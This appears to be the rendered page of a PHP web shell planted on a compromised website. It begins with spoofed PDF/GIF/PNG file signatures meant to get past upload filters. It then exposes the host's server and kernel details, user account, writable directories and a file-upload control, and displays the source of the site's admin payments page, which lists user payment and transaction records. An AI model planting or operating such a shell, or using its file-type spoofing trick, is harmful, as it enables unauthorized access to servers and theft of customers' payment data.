%PDF- %GIF98; %PNG; .
Cyber Programmer
Logo of a company Server : Apache
System : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : addictionfreeind ( 1003)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/addictionfreeind/www/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/addictionfreeind/www/admin/payments.php
<?php
include "top.php";
?> 
<div class="content-wrapper"> 
<section class="content-header sty-one">
<h1>payments</h1>
<ol class="breadcrumb">
<li><a href="dashboard.php">Home</a></li>
<li><i class="fa fa-angle-right"></i> payments</li>
</ol>
</section>
<section class="content">
<div class="table-responsive">
<table id="example1" class="table table-bordered table-striped">
<thead>
<tr>
<th>ID</th>
<th>username</th>
<th>orderid</th>
<th>txnid</th>
<th>date</th>
<th>amount</th>
<th>points</th>
</tr>
</thead>
<tbody>
<?php
$i=1;
$query="select * from payments order by date DESC";
$result=mysqli_query($c,$query);
while($row	=	mysqli_fetch_array($result))
{	
?>
<tr>
<td><?php echo $i++;?></td>
<td><?php echo $row['username'];?></td>
<td><?php echo $row['orderid'];?></td>
<td><?php echo $row['txnid'];?></td>
<td><?php echo $row['date'];?></td>
<td><?php echo $row['amount'];?></td>
<td><?php echo $row['points'];?></td>
</tr>
<?php
}
?>
</table>
</div>
</section>
<?php
include "footer.php";
?>

VaKeR 2022